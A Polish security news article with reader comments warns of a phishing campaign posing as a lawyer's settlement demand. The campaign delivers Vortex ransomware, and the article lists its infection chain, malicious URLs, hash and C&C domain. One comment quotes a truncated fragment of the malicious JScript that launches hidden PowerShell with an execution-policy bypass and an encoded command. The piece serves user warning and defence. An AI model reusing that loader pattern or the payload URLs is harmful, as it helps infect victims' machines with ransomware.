10.01.2018 | 09:51

Adam Haertle

Uwaga na nowy atak ze sprytną sztuczką – „Wezwanie do zawarcia ugody”

Do skrzynek polskich firm od paru godzin trafia nowa kampania złośliwego oprogramowania, które niesie ze sobą popularne ransomware Vortex. Autor kampanii użył pewnej rzadko spotykanej sztuczki – warto ostrzec użytkowników.

Kampania jest kolejna odsłoną ataków obserwowanych przez nas od lat i stoi za nią świetnie nam znany przestępca Thomas. Używa tej samej infrastruktury co zwykle i jako jedyny wysyła do swoich ofiar tę właśnie rodzinę ransomware.

Wezwanie do zawarcia ugody

Nadawca wiadomości podszywa się pod adwokata, a sama wiadomość tak:

Treść wiadomości:

Witam Serdecznie
Działając w imieniu mojego mocodawcy.
W załączeniu przesyłam przedsądowe wezwanie do zawarcia ugody.
Adwokat
Wojciech Wilgierz

Na zrzucie ekranu widzicie ikonę pliku PDF – jednak wiadomość nie ma żadnego załącznika. To dość sprytna sztuczka, gdzie w treści wiadomości wstawiono plik graficzny pokazujący ikonę, a z nim powiązano link do strony WWW, która serwuje dalszy ciąg ataku. Jeśli zatem ktoś kliknie w „plik PDF” to niespodziewanie otrzyma złośliwy plik JS.

Proces infekcji

Link z emaila ukryty pod obrazkiem prowadzi do witryny:

http://edokumenty-wfirma.pl/

Tam użytkownik zostaje przekierowany do

https://dropbox.com/s/yd1vr2yoa81p4gl/Wezwanie%20do%20zawarcia%20Ugody_PDF.js?dl=1

Plik JS uruchamia Powershella, który z kolei pobiera plik

http://huntersofgods.cba.pl/wp-local/1001.exe

To ransomware Vortex – jego najważniejsze cechy:

SHA256: a980095311d005a23796358a815150f1e1d239617c7d477d8f8ca0b5dba8a15d
C&C: wfirma.eu
Adresy email: [email protected], [email protected]

Wiadomości z atakiem wysyłane są jak zawsze z serwerów Nazwa.pl:

Received: from anb163.rev.netart.pl ([85.128.210.163])

Domeny zarejestrowane wczoraj przez Nazwa.pl:

wfirma.eu to 31.41.216.78
edokumenty-wfirma.pl to aktualnie 85.128.134.236, ale była już na innych adresach

Przekażcie użytkownikom, by nie dali się złapać na tę sztuczkę przestępcy.

Dziękujemy wszystkim Czytelnikom, którzy podesłali próbki.

Powrót

Komentarze

  • 2018.01.10 10:24 aa

    To pliki JS tak z czapy mogą sobie odpalić PowerShella?

    Odpowiedz
    • 2018.01.10 13:05 bb

      pewnie skrot myslowy.
      – klikasz w 'zalacznik’
      – sciagasz .js z dropboxa [dl=1] myslac, ze to pdf z zalacznika
      – otwierasz lokalnie ’.pdf’ bedacy .js
      – odpala sie ps
      socjotechnika

      Odpowiedz
      • 2018.01.10 22:06 dzek

        te jscripty w ogole sie komus do czegos przydaja? czemu mamy 2018 a windows dalej domyslnie otwiera to gowno?

        Odpowiedz
        • 2018.01.11 12:50 Zdzich

          Microsoft tez zadał sobie to pytanie i … wypuścił Windows 10 S

          Odpowiedz
        • 2018.01.11 15:45 jasc

          U mnie windows też odpala to gówno – ale w Notatniku, więc mogę sobie najwyżej poczytać zawartość :)
          PowerShella coś mi może ew. uruchomić – ale żadnego skryptu w nim już nie wykona (zablokowane w Rejestrze).
          Warto czytać regularnie takie portale, by wiedzieć jak, nawet w prosty sposób, zabezpieczyć swój komputer!

          Odpowiedz
          • 2018.01.13 22:46 Nowy

            Proszę o informację jak zablokować uruchamianie oraz wykonywanie skryptów w PowerShell – co należy zmienić w rejestrze aby zablokować ich wykonywanie bądź uruchomienie PowerShella?

          • 2018.01.16 19:00 jasc

            Adam, to narzędzie wygląda całkiem nieźle, sam z niego skorzystam – tylko:
            1. To nie jest rozwiązanie dla zwykłego windowsowego „klikacza” – może szybko sprawić więcej problemów niż dać korzyści; najpóźniej przy próbie wypełnienia interaktywnego formularza PIT w Adobe Readerze – nic się nie da w nim zrobić, o ile w ogóle się wczyta = skończy się reinstalacją Windy :).

            Proponuję mniej inwazyjne rozwiązanie – choć blokuje tylko wykonywanie skryptów PowerShella, np.: http://pl.ccm.net/faq/8621-jak-wylaczyc-windows-script-host
            To samo tylko dla bardziej technicznych wrzucił powyżej Kolega @as: https://technet.microsoft.com/en-us/library/ee198684.aspx

            Oczywiście, PRZED jakimkolwiek grzebaniem w Rejestrze należy wyeksportować sobie do pliku zmienianą gałąź, albo cały Rejestr lub wykonać punkt przywracania systemu.

            2. Gdybyś nie wrzucił tego linka tutaj – nigdy nie ściągnąłbym jakiegokolwiek .exe z GitHuba czy innych internetów – a tym bardziej nie uruchomił tego z uprawnieniami i na koncie Administratora :)

          • 2018.01.16 19:08 Adam

            No ale zaraz, można wybrać które opcje się zaznacza, a potem można je odznaczyć i jest przywrócone. To nawet moja mama potrafi. A interaktywne formularze PIT w AR – raz do roku można zadzwonić do informatyka…

          • 2018.01.16 21:17 jasc

            hehe, można… a nawet trzeba – przeczytać cały tekst na stronie autora; a w praktyce, już po uruchomieniu programu, niezbyt zorientowany użytkownik:
            – Widzi duży przycisk „zrób tak, aby wszystko było dobrze” :), a poniżej: ustawienia dla ekspertów – nie grzeb w tym, jeśli nie jesteś pewny co robisz. Zgadnij co kliknie, i… zapomni.
            – Który z nich, pod koniec kwietnia, wypełniając PITa na ostatnią chwilę, będzie pamiętał i skojarzy, że w połowie stycznia ściągnął i uruchomił jakiś programik, który coś tam pozmieniał.

            Oczywiście, to nie problem takich portali – tylko części użytkowników, którzy muszą pamiętać, że to nie komputerświat czy dobreprogramy, więc nie powinni wykorzystywać informacji/porad/rozwiązań, które ich przerastają :).

  • 2018.01.10 10:30 Tomek

    A co najciekawsze u mnie, na ponad 2 tys. userów ten e-mail przyszedł tylko do osoby, która w grudniu się sądziła.

    Odpowiedz
  • 2018.01.10 10:31 Jonasz

    Czemu tego Tomaszka jeszcze nikt nie złapał? Czy Nazwa komentowała już fakt pojawiania się swojej nomen omen nazwy w prawie każdym artykule tego typu?

    Odpowiedz
  • 2018.01.10 10:55 AlexP

    „Jak zawsze z serwerów Nazwa.pl” nikt chyba tyle dobrego kryminałom nie zrobił ile robi Nazwa :-)

    Odpowiedz
    • 2018.01.10 22:07 dzek

      home.pl nielepszy

      Odpowiedz
  • 2018.01.10 11:07 tomasz

    co zrobić jeśli kliknąłem w załącznik jpg. ?

    Odpowiedz
  • 2018.01.10 11:11 Marcin

    Otworzyłem tego maila czy w związku z tym coś mi grozi?

    Odpowiedz
    • 2018.01.10 11:57 martin

      jeżeli nie klikałeś na zawartość w mailu to nie.

      Odpowiedz
  • 2018.01.10 11:13 luk

    Mam w domenie użytkownika któremu samo się kliknęło, ściągnęło, uruchomiło ;) Puściłem przywracanie systemu 2 dni wstecz. Skanuję defenderem. Jakieś rady?

    Odpowiedz
    • 2018.01.10 11:55 Re:luk

      najpierw sformatuj stację, następnie przywróć z kontrolera domeny jej obraz – bez czyszczenia ryzykujesz

      Odpowiedz
      • 2018.01.10 20:26 xxx

        Obraz z kontrolera ? :)

        Odpowiedz
    • 2018.01.10 12:08 Marek

      Rada na przyszłość: zablokować odpalanie powershell w domenie.

      Odpowiedz
  • 2018.01.10 11:42 agata

    [email protected] z takiego maila dzisiaj dostałam identyczny plik. Duzo stresu. Strona adwokata istnieje w internecie-ale telefonów nie odbiera.

    Odpowiedz
    • 2018.01.10 15:04 jaaaa

      tak samo u mnie

      Odpowiedz
    • 2018.01.11 13:45 Piotrek

      Ja także dostałem takiego maila – starałem się uważać, jednak pobrałem niechcący ten skrypt (nie klikałem w sam załącznik, tylko sprawdziłem adres „podpięty” pod plik. Adres jednak przekierował mnie do pobrania pliku). Nie uruchomiłem go. Usunąłem (shift+del) i zeskanowałem komputer. Na szczęście nic się nie stało. Po 5 godzinach od próby infekcji dodzwoniłem sie do owej kancelarii. Człowiek zmęczonym głosem bardzo przepraszał mnie za incydent. Nie dodzwoniłaś się, bo pewnie w tym czasie dzwoniły tam setki ludzi…

      Odpowiedz
  • 2018.01.10 12:52 M

    wilgierz.pl przekierowało mnie na http://student.agh.edu.pl/~przemop/WW/index.html …. hmmmmm

    Odpowiedz
  • 2018.01.10 13:09 Wp1

    A jak został sciągniety plik to co zrobić???

    Odpowiedz
    • 2018.01.10 14:14 Kamil

      Nie klikać

      Odpowiedz
  • 2018.01.10 13:25 Tomasz

    Co zrobić jak się kliknęło, a potem dopiero przeczytałem to wszystko co powyżej (w Windows 10 z Defenderem)?
    Czy wystarczy przeskanowanie komputera Defenderem, co teraz robię?

    Odpowiedz
  • 2018.01.10 13:29 Tomasz

    Co zrobić jak już kliknąłem, a potem dopiero przeczytałem to wszystko co powyżej? W windows 10 z defenderem. Skanowanie defenderem wystarczy czy nie?

    Odpowiedz
    • 2018.01.10 20:34 Tomasz

      Przeskanowałem, ale wykrył co jeszcze coś innego. Usunąłem to coś innego i skanuję jeszcze raz. Powinien był wykryć gdyby wirus był, bo w aktualnej bazie podobno to jest. Zobaczymy co dalej.

      Odpowiedz
  • 2018.01.10 13:30 starszy oborowy

    To już jest odszywanie się pod inną osobę /adwokata, obojętnie czy istniejącego czy nie/. Można za to nieźle „beknąć”.

    Odpowiedz
  • 2018.01.10 15:28 Kasia

    Co jeśli otworzyłam na tablecie ? Czy muszę zmieniać hasła do skrzynek mailowych , kont bankowych etc ….?

    Odpowiedz
    • 2018.01.10 17:01 Agata

      Ja kliknelam w link na tel ale otworzyła mi się pusta strona. Tel też może być zainfekowany?

      Odpowiedz
  • 2018.01.10 15:40 Darek

    Dzisiaj przyszedł do mnie ten mail. Niestety kliknąłem w link ukryty pod grafiką „pdf”, ale zanim strona się otworzyła, szybko zamknąłem przeglądarkę. Na pewno nie uruchomił się powershell, nie pobrałem też żadnego pliku „exe”. Czy w takiej sytuacji mogło dojść do zainfekowania komputera, czy nie ma powodu do obaw?

    Odpowiedz
    • 2018.01.10 19:00 Artur

      Power Shell w każdej z kampanii Thomasa uruchamia się „ukryty” co masz chyba w każdym artykule zaznaczone ;)

      Odpowiedz
      • 2018.01.10 22:27 Darek

        To może zapytam inaczej – czy po otwarciu takiej złośliwej strony dochodzi od razu do infekcji komputera, czy może to nastąpić np. parę godzin/dni później? Jak napisałem, kliknąłem w ten odnośnik w mailu, ale szybko zamknąłem stronę do której było przekierowanie. Wydaje mi się, że ten złośliwy skrypt nie zdążył się uruchomić, no ale kto wie… Przeskanowałem komputer kilkoma antywirusami, nic nie wykryły. Póki co wszystko działa jak należy i mam nadzieję, że nie będę musiał cierpieć za swoją głupotę ;)

        Odpowiedz
  • 2018.01.10 16:22 FlashT

    Śmierdzi na kilometr. W życiu bym tego nie otworzył (choć dostałem takiego maila).

    Odpowiedz
  • 2018.01.10 17:09 Aga

    Ja kliknelam w link na tel ale otworzyła mi się pusta strona. Tel też może być zainfekowany?

    Odpowiedz
  • 2018.01.10 17:21 Jacek

    I co? Nie ma szans na identyfikację Thomasa?

    Odpowiedz
    • 2018.01.10 22:29 xxx

      Dobre pytanie. Czemu jest tak trudno namierzyc tego typa ?

      Odpowiedz
  • 2018.01.10 18:06 novos7

    Już któryś raz z rzędu przestępcy wykorzystują Dropboxa do rozprzestrzeniania złośliwego pliku. Co gorsza link nadal działa. Czy oni tam w ogóle mają jakieś zabezpieczenia? Nikt nie kontroluje wgrywanych plików? Nawet nie ma sposobu, by zgłosić złośliwy plik. Jedynie naruszenie praw autorskich

    Odpowiedz
  • 2018.01.10 18:42 Paulina

    Witam wszystkich ja otrzymałam taką wiadomość

    Wezwanie do zawarcia ugody

    Adwokat Wojciech Wilgierz (10 stycznia 2018 05:17)
    Witam Serdecznie
    Działając w imieniu mojego mocodawcy.
    W załączeniu przesyłam przedsądowe wezwanie do zawarcia ugody.
    Adwokat
    Wojciech Wilgierz

    Coś mi nie pasowało co prawda parę miesięcy temu miałam sprawę o odrzucenie spadku ale nie było żadnych adwokatów więc zaczęłam sprawdzać kto to taki faktycznie pan istnieje ma kancelarie w Krakowie a ja mieszkam w Łodzi więc szukam dalej i w taki sposób trafiłam na waszą stronkę i wiem że to oszustwo .Co teraz czy wystarczy tylko usunąć tą wiadomość ?

    Odpowiedz
    • 2018.01.10 22:18 wdeww

      ważne jest to że twoje dane (adres email) wyciekł…

      Odpowiedz
  • 2018.01.10 22:17 erf34frefeg

    jak zwykle podziemne handlowanie bazami danych klientów :) no i ta zajebista firma nazwa.pl oby szybko zdechła

    Odpowiedz
  • 2018.01.10 23:01 Karol

    Mógłby ktoś odnieść się do mojej sytuacji? Niestety spam u nas nie został zignorowany, co więcej pobrano załącznik i go uruchomiono (i to kilkukrotnie). Po chwili kaspersky odezwał się i zablokował jakoś 7krotnie niebezpieczny adres internetowy – huntersofgods.cba.pl/wp-local/1001.exe – pliki usunięto. Po 12 godzinach nic się nie dzieje, czy oznacza to, że wszystko w porządku?

    Odpowiedz
  • 2018.01.10 23:48 Mac

    Rozumiem że OSX jest bezpieczny ?
    Nawet po kliknięciu i ściągnięciu pliku ?

    Odpowiedz
    • 2018.01.11 06:35 Robert

      Może ktoś ogarnięty wyjaśnić, jak sprawdzić czy komputer został zainfekowany tym g…nem?

      Odpowiedz
  • 2018.01.11 03:04 Robert

    Js jest uniwersalny tak jak java, tam gdzie zainstalowana jest tam skrypty robią szkody

    Odpowiedz
    • 2018.01.11 13:19 MA

      JS tak ale odpala PowerShella ktory jest tylko na Windzie

      Odpowiedz
  • 2018.01.11 08:09 Samarama

    Dostałem go wczoraj. Od razu wiadomo, że to fake. Nikt normalny e-mailem nie wysyła takich rzeczy, bez uprzedniego kontaktu w inny sposób. Fakt, kancelaria z takim adwokatem istnieje, ale nie ma domeny z „nazwa.pl” w… nazwie. :) Prawnicy nie bawią się w wysyłanie pism, punktualnie o 5.00 rano. Obrazek imitujący ikonkę PDFa, też kulawy jak nieszczęście. Pipa z tego całego Thomasa. Sprokurował tego e-maila jak dziecko, które zostało „siedzieć” w zerówce. ;)
    Tym bardziej dziwi „inteligencja” ludzi z komentarzy, którzy jak ślepe barany klikali w ten załącznik.

    Odpowiedz
    • 2018.01.11 10:36 Darek

      Jako, że zostałem wywołany do tablicy jako „baran”. Kliknąłem w link zupełnie przez przypadek, w momencie gdy chciałem skopiować treść maila, żeby to wrzucić do google. Ręka się omsknęła i tyle. Zdarza się. Na szczęście w porę wyłączyłem przeglądarkę i na chwilę obecną nie widzę powodów do obaw o swoje pliki. W każdym razie sugerowałbym być bardziej ostrożnym w swoich wywodach i nazywaniem ludzi „baranami”.

      Odpowiedz
      • 2018.01.11 11:51 Michal

        Darek, no przykro nam ale jestes baranem. Omylkowo czy nie, to nie ma znaczenia.

        Jak omylkowo zabijesz czlowieka, to co?

        Odpowiedz
        • 2018.01.11 14:57 Darek

          Kolego, jeśli nie widzisz różnicy w przypadkowym kliknięciu odnośnika, a celowym, bezmyślnym klikaniem w każdy link jaki przychodzi na maila, to naprawdę nie mamy o czym dyskutować, bo najwidoczniej inaczej rozumiemy słowo „baran”.

          Odpowiedz
  • 2018.01.11 13:14 Łukasz

    Ściągnąłem sobie ten plik JS. Serio, system znany z tego że powstało na niego 99% szkodliwego oprogramowania na świecie pozwala na takie coś:

    new ActiveXObject(„wSCRIpT.shEll”).RuN( '”pOwERsheLL.exe” pOWeRsHELl.eXe -eX BypaSS -W hIDDEn -EC IABwAE8AVwBlAFIAcwBI…

    W słowniku ludzi kulturalnych brak słów, żeby wystarczająco obelżywie skomentować taką sytuację.

    Odpowiedz
    • 2018.01.12 15:43 Ryszard

      WSH to narzędzie do automatyzacji działania systemu Windows. Tak jak nóż jest bardzo pomocny ale możesz go wykorzystać do zabijania, tak ten mechanizm może być bardzo pomocny w codziennej pracy ale można go wykorzystać w sposób złośliwy, wręcz przestępczy. To samo mógłbyś powiedzieć o plikach *.exe.

      Odpowiedz
  • 2018.01.11 13:41 as

    Dla użytkowników windows:
    zmieńcie domyslną aplikację do otwierania plików javascript (rozszerzenie .js). Domyślnie plik taki jest wykonywany po dwukliku, wystarczy przyporzadkowac ten typ pliku np do notatnika i nawet jak ktos pobierze i odpali to włączy się edytor tekstu i nic się nie stanie.

    Najlepsze zabezpieczenie to wylaczenie wykonywania wszelkich skryptow w kontekscie systemu operacyjnego, wystarczy dodac wpis do rejestru:
    https://technet.microsoft.com/en-us/library/ee198684.aspx

    Odpowiedz
    • 2018.01.11 18:13 Łukasz

      Tylko dlaczego tego nie ma domyślnie zrobionego? Przynajmniej na „cywilnych” Windowsach, podejrzewam że na Windows Server to może być przydatna opcja, ale to nie jest wersja systemu używana masowo przez zwykłych użyszkodników.

      Odpowiedz
      • 2018.01.16 22:23 jasc

        Pójdźmy dalej i zapytajmy: dlaczego „składników Windows”, których kompletnie nie potrzebujemy, a mogą stanowić potencjalny wektor ataku – np. Remote Desktop, nie można (win7, kolejne zapewnie też) odinstalować w Panelu sterowania > Programy i funkcje ???
        Komplet ich plików, także wykonywalnych (nie mówię tu o współdzielonych bibliotekach itp.) pozostaje nienaruszony na dysku – znika tylko link w menu Start. Ich usługi przy każdym starcie Windows są nadal uruchamiane. To dopiero jest ciekawostka :).

        Odpowiedz
  • 2018.01.11 14:34 Grzegorz

    Zgłosiłem wczoraj sprawę do NAZWA ale indolencja konsultanta porażająca… mają to totalnie gdzieś.

    Odpowiedz
  • 2018.01.12 03:17 Dash

    Jeżeli w przeglądarce mieliście odpalone automatyczne pobieranie z uruchomieniem pliku po wykonaniu tej akcji mogło wam się coś stać, jeśli nie to chyba nie. Tak mi się wydaje, poprawcie mnie jak coś.

    Odpowiedz
  • 2018.01.12 15:49 Ryszard

    Cóż, widzę, że ludzie się do tej pory nie nauczyli, że w pole „From” w mailu można wpisać cokolwiek i serwer tego nie weryfikuje, zaś prawdziwe pochodzenie wiadomości można znaleźć w pozostałych nagłówkach, których programy pocztowe standardowo nie wyświetlają. Wtedy byłoby widać, że poczta od adwokata wcale nie przyszła z tego adresu, z którego udaje że przyszła. Żal mi tego adwokata (bo jak się okazuje on naprawdę istnieje) bo mu się teraz burza koło d.py zrobiła. Tak to można właśnie ud.pić człowieka.

    Odpowiedz
  • 2018.01.13 08:49 Robert

    Temat wisi tutaj już kilka dni, kilkanaście osób zadało jakieś tam nurtujące je pytania a odpowiedzi praktycznie nie ma. TO NA WUJA W OGÓLE JEST TA STRONA?

    Odpowiedz
    • 2018.01.13 23:11 Adam

      Jeśli ktoś otworzył emaila na telefonie/tablecie/Macu/Linuksie to nic się nie stało
      Jeśli ktoś tylko otworzył emaila na Windowsie to nic się nie stało
      Jeśli ktoś tylko otworzył emaila na Windowsie, kliknął w linka i pobrał załącznik to nic się nie stało
      Jeśli ktoś otworzył emaila na Windowsie, kliknął w linka i pobrał załącznik a następnie go uruchomił to ma zaszyfrowany komputer
      Jeśli ktoś otworzył emaila na Windowsie, kliknął w linka i pobrał załącznik a następnie go uruchomił i nie ma zaszyfrowanego komputera to ma bardzo dużo szczęścia i dobry program antywirusowy powinien pomóc.

      Odpowiedz
  • 2018.01.19 00:25 Daniel

    Dobra, a co w przypadku kiedy pewna nierozgarnięta osoba sprowadziła to nieszczęście na drugą?
    Bo ja właśnie w ten sposób straciłem dzisiaj konto na steamie i dostęp do maila… Który był powiązany ze steamem. Znajdzie się jakaś dobra duszyczka która będzie w stanie mi coś doradzić w takim wypadku?

    Odpowiedz
  • 2018.08.02 10:26 Kamil

    I kolejne wiadomości z adresu:
    [email protected]

    Dzień dobry,
    dziękujemy za skorzystanie z naszych usług.
    W załączniku przesyłam fakturę do złożonego zamówienia.

    Pozdrawiam,

    Wilk Marta

    Odpowiedz
  • 2018.08.04 23:10 Megi

    UWAGA – właśnie przyszedł do mnie e-mail w nim załącznik z rozszerzeniem .rar o tytule: Faktura nr 10987 FS 1091/MAG/07/2018, a w treści; Dzień dobry,
    dziękujemy za skorzystanie z naszych usług.
    W załączniku przesyłam fakturę do złożonego zamówienia.

    Pozdrawiam,

    Wilk Marta

    A ja nic nie zamawiałam :)

    a

    Odpowiedz

Zostaw odpowiedź

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Uwaga na nowy atak ze sprytną sztuczką – „Wezwanie do zawarcia ugody”

Komentarze